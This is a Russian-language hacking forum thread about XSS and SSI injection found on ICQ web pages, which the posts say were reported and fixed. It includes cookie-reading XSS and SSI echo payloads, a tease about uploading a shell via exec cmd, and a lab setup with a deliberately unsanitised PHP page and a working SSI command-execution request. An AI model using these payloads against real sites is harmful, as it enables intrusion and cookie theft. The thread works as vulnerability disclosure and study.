SSI на сервере ICQ

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by alkos, 24 May 2015.

  1. alkos

    alkos Moderator

    Joined:
    28 Mar 2007
    Messages:
    1,153
    Likes Received:
    291
    Reputations:
    271
    Не так давно на сервере people.icq.com изменили форму отображения инфо о уине. Пример:

    [​IMG]



    Самая первая мысль, а что если в поле people.icq.com/people/<UIN>/ ввести что-то другое?

    Попробует выполнить скрипт <body onload=alert('XSS'):


    [​IMG]



    Так-так-так! :D XSS работает, значит можно воровать кукисы <body onload=alert(document.cookie)>:

    [​IMG]



    А может кто-то по ошибке забыл отключить Server Side Include (SSI)? Сервер пашет на nginx. На удачу составим запрос с отображением локального времени <!--#echo var="DATE_LOCAL" -->:

    [​IMG]



    Опачки! Работает! :D
    А адрес сервера покажет?


    [​IMG]



    А путь к корню?

    [​IMG]



    Так может и шелл можно залить <!--#exec cmd="<залить шелл>" --> ???... :cool:

    А это уже совсем другая история.... ;)


    P.S. На момент написания статьи администрация ICQ уже была оповещена о данной уязвимости и залатала дырку.

    (с) alkos
     
    _________________________
    Konqi, kingbeef, KIR@PRO and 7 others like this.
  2. alkos

    alkos Moderator

    Joined:
    28 Mar 2007
    Messages:
    1,153
    Likes Received:
    291
    Reputations:
    271
    [​IMG]
     
    _________________________
  3. waik

    waik Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    499
    Likes Received:
    164
    Reputations:
    12
    Читал пост ТС и все боялся что он подробно расскажет всем как залить шелл)
    Обошлось.
     
    VentaL74 likes this.
  4. qwertov

    qwertov New Member

    Joined:
    23 May 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Зла не хватает. Кто то адаптируется, а кто то взламывает.
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    _________________________
    Br@!ns and YaBtr like this.
  6. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    561
    Likes Received:
    159
    Reputations:
    324
    Алкос подари 31338))
     
  7. alkos

    alkos Moderator

    Joined:
    28 Mar 2007
    Messages:
    1,153
    Likes Received:
    291
    Reputations:
    271
    это номер [ e l i T e ] вообще-то, у него спрашивай
     
    _________________________
  8. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    561
    Likes Received:
    159
    Reputations:
    324
    странно я думал это анрег.
     
  9. alkos

    alkos Moderator

    Joined:
    28 Mar 2007
    Messages:
    1,153
    Likes Received:
    291
    Reputations:
    271
    31338 » 0x05 — REGISTRED…
    31338 » 11.01.2013 07:01:33
     
    _________________________
  10. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    726
    Reputations:
    948
    Предполагаю, что такие вещи актуальны не только для XSS, но и SQL inj, когда результат запроса выводится на страницу, тоесть может быть нечто подобное SQL inj -> XXS(SIXSS) -> SSI. Только стоит сказать один важный момент, сам nginx хоть и имеет потдержку SSI, но он не умееет запускать внешнюю программу, в отличии от Apache(нагуглил gemaglabin). В Apache SSI реализован через модуль mod_include, но для работы exec cmd еще нужно mod_cgi или mod_cgid, а также отключенная директива IncludesNoExec, иначе в контенте на html страничке будет [an error occurred while processing this directive] и в лог ошибок(если включен) будет падать запись: AH01371: unknown directive "exec" in parsed doc.

    Code:
    sudo mkdir -p /srv/www/vuln_dev/public_html
    sudo mkdir /srv/www/vuln_dev/logs
    sudo chown $USER: -R  /srv/www/vuln_dev/public_html
    sudo nano /etc/apache2/sites-available/vuln-dev.conf
    <VirtualHost *:80>
      ServerAdmin vuln@locahost
      ServerName vuln
      DocumentRoot /srv/www/vuln_dev/public_html
    
      <Directory /srv/www/vuln_dev/public_html/>
      AllowOverride All
      Require all granted
      </Directory>
      ErrorLog /srv/www/vuln_dev/logs/error.log
      LogLevel warn
    </VirtualHost>
    sudo a2ensite vuln-dev.conf
    sudo nano /etc/hosts
    127.0.0.1 vuln
    sudo nano /etc/apache2/mods-available/userdir.conf
    #IncludesNoExec
    sudo a2enmod include
    sudo a2enmod cgi
    sudo service apache2 restart

    nano /srv/www/vuln_dev/public_html/.htaсcess
    Code:
    Options Includes
    AddType application/x-httpd-php .html
    AddOutputFilter INCLUDES .html

    nano /srv/www/vuln_dev/public_html/index.html
    HTML:
    <!DOCTYPE html>
    <html>
    <head>
      <title>Тест</title>
      <meta <meta charset="UTF-8">
    </head>
    <body>
       <?=$_GET['t'];?>
    </body>
    </html>

    Запрос
    Code:
    <!--#exec cmd="ls -la" --> это %3C!--%23exec%20cmd%3D%22ls%22%20--%3E
    http://vuln/?t=%3C!--%23exec%20cmd%3D%22ls%20-la%22%20--%3E
    


    Ответ
    HTML:
    <!DOCTYPE html>
    <html>
    <head>
      <title>Тест</title>
      <meta <meta charset="UTF-8">
    </head>
    <body>
       total 16
    drwxr-xr-x 2 omen666 omen666 4096 May 28 04:26 .
    drwxr-xr-x 4 root  root  4096 May 28 01:01 ..
    -rw-r--r-- 1 omen666 omen666  87 May 28 04:26 .htaccess
    -rw-r--r-- 1 omen666 omen666  138 May 28 03:53 index.html
    </body>
    </html>
    ps все пошла школота хекать )
     
    _________________________
    #10 Strilo4ka, 28 May 2015
    Last edited: 28 May 2015
  11. Poltergeist

    Poltergeist Member

    Joined:
    22 Jun 2010
    Messages:
    53
    Likes Received:
    18
    Reputations:
    9
    В продолжение темы. Вместе с Stored XSS на icq.com/chat/* (пост) нашлась также и SSI Inj. Поскольку команда exec cmd не работала, выдавая упомянутое выше [an error occurred while processing this directive], то, по-видимому, залить шелл возможности не имелось.

    Fixed.

    <!--#echo var="DOCUMENT_ROOT" -->
    <!--#echo var="LOCAL TIME" -->
    <!--#echo var="HTTP_ACCEPT" -->

    [​IMG]

    <!--#echo var="HTTP_COOKIE" -->

    [​IMG]
     
    HAXTA4OK and alkos like this.
  12. alkos

    alkos Moderator

    Joined:
    28 Mar 2007
    Messages:
    1,153
    Likes Received:
    291
    Reputations:
    271
    Poltergeist, забавно. Ничему жизнь не учит.
     
    _________________________
Loading...